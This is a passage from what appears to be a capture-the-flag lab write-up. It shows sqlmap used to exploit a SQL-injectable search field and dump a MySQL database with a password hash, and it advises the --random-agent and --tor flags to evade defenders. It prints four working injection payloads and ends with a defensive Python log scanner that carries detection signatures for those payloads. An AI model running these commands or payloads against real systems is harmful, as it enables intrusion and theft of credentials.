Figure 4: The POST request with the potential SQL injection vector.

The request can be passed off to sqlmap (n.d.), a tool that automates the process of exploiting SQL injection vulnerabilities. To do this, I started up a terminal on my AttackBox, changed directory to my Game Zone project files and started sqlmap with the following parameters:

└─$ sqlmap --random-agent -r requests.txt --dbms=mysql --dump

The -r flag specifies the request text file that I saved a moment ago, the --dbms flag specifies the database management system (MySQL in this case) that the target system is running, and the --dump flag instructs sqlmap to dump the entire database. Finally, the --random-agent flag instructs sqlmap to use random browser user-agent strings, which can confuse any systems administrators or security analysts who are on the lookout for hackers.

Protip: in a real-world red teaming engagement, the --tor flag can be used to tunnel sqlmap requests and network traffic through the Tor anonymity software (Tor Project, n.d.), which can further baffle any system administrators or security analysts.

sqlmap reported the following information regarding the kinds of SQL injection it identified:

sqlmap identified the following injection point(s) with a total of 90 HTTP(s) requests:
---
Parameter: searchitem (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: searchitem=-2335' OR 7043=7043#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: searchitem=dna deniers' AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(7775=7775,1))),0x71786a7871),7775)-- aOTf

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchitem=dna deniers' AND (SELECT 1312 FROM (SELECT(SLEEP(5)))EjBJ)-- fvCO

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchitem=dna deniers' UNION ALL SELECT NULL,CONCAT(0x716b627171,0x6a41586165704d534f575655686848776e59524f666c767767504672656e4c50695148467942434e,0x71786a7871),NULL#
---

The input text box is vulnerable to four different kinds of SQL injection: a UNION query-based SQL injection, a boolean-based blind SQL injection, an error-based SQL injection and a time-based blind SQL injection. I will not be discussing the technical aspects of these injections, but for anyone interested in a comprehensive treatment I recommend the book SQL Injection Attacks and Defense (Clarke, 2012).

After sqlmap finished dumping the MySQL instance from the target machine, I examined the tables that it dumped. I noticed two tables, the post table and the user table. The post table just contains video game titles and descriptions of them. The user table (depicted in Fig. 5) has a lot more useful information: both a username and a pwd field, the second field being the hashed password of its respective username.

Figure 5: formatted table of the user table dump. Note that there is only one row in the table; I have split the full hash into two rows so that the table is easier to read.

I used the Hash Type Identifier (n.d.) to work out that this hash was generated with the SHA-256 algorithm. With a username and hashed password at hand, I can now proceed to crack the hash with John the Ripper (OpenWall, n.d.).
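From the defender's side, the four techniques in sqlmap's report and the user-agent rotation that --random-agent causes both leave recognisable traces in application logs. The following is an added example, not code from the original write-up: a Python scanner over a constructed log format and constructed sample lines that carry the payloads above URL-encoded; the /search path and the source addresses are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Signatures for the four techniques sqlmap reported against searchitem, modelled
# on the payload shapes in the write-up (illustrative, not a full injection ruleset).
SIGNATURES = [
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based", re.compile(r"\b(?:GTID_SUBSET|EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:OR|AND)\s+(\d+)\s*=\s*\1\b", re.I)),
]

# Constructed application-log format: one POST per line, body still URL-encoded.
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) POST (?P<path>\S+) '
                    r'ua="(?P<ua>[^"]*)" body="(?P<body>[^"]*)"$')

# Constructed sample: the write-up's four payloads (hex marker abbreviated), sent
# from one source under a different User-Agent each time, as --random-agent does.
SAMPLE_LOG = [
    '2024-05-01T10:22:13Z 10.10.14.5 POST /search ua="Mozilla/5.0 (X11; Linux x86_64)" body="searchitem=dna+deniers"',
    '2024-05-01T10:22:14Z 10.10.14.5 POST /search ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64)" body="searchitem=-2335%27+OR+7043%3D7043%23"',
    '2024-05-01T10:22:15Z 10.10.14.5 POST /search ua="Opera/9.80 (Macintosh; Intel Mac OS X)" body="searchitem=dna+deniers%27+AND+GTID_SUBSET%28CONCAT%280x716b627171%2C%28SELECT+%28ELT%287775%3D7775%2C1%29%29%29%2C0x71786a7871%29%2C7775%29--+aOTf"',
    '2024-05-01T10:22:16Z 10.10.14.5 POST /search ua="Mozilla/5.0 (iPhone; CPU iPhone OS 13_2)" body="searchitem=dna+deniers%27+AND+%28SELECT+1312+FROM+%28SELECT%28SLEEP%285%29%29%29EjBJ%29--+fvCO"',
    '2024-05-01T10:22:17Z 10.10.14.5 POST /search ua="Mozilla/5.0 (Android 10; Mobile)" body="searchitem=dna+deniers%27+UNION+ALL+SELECT+NULL%2CCONCAT%280x716b627171%2C0x6a41%2C0x71786a7871%29%2CNULL%23"',
    '2024-05-01T10:22:18Z 10.10.14.9 POST /search ua="Mozilla/5.0 (X11; Linux x86_64)" body="searchitem=mario"',
]

def classify(value):
    """Names of every technique whose signature matches the decoded parameter."""
    return [name for name, rx in SIGNATURES if rx.search(value)]

def scan(lines):
    """Return (hits, churn): hits are (ts, ip, techniques) for injected searchitem
    values; churn maps each source IP to its number of distinct User-Agents."""
    hits, agents = [], defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        agents[m["ip"]].add(m["ua"])
        for value in parse_qs(m["body"]).get("searchitem", []):
            found = classify(value)
            if found:
                hits.append((m["ts"], m["ip"], found))
    return hits, {ip: len(uas) for ip, uas in agents.items()}

def agent_churn_alerts(churn, threshold=3):
    """Source IPs that rotated through more than `threshold` distinct User-Agents."""
    return sorted(ip for ip, n in churn.items() if n > threshold)
```

A burst of distinct User-Agents from one address is a weak signal on its own, but paired with injection hits from the same address it is exactly the pattern this traffic leaves.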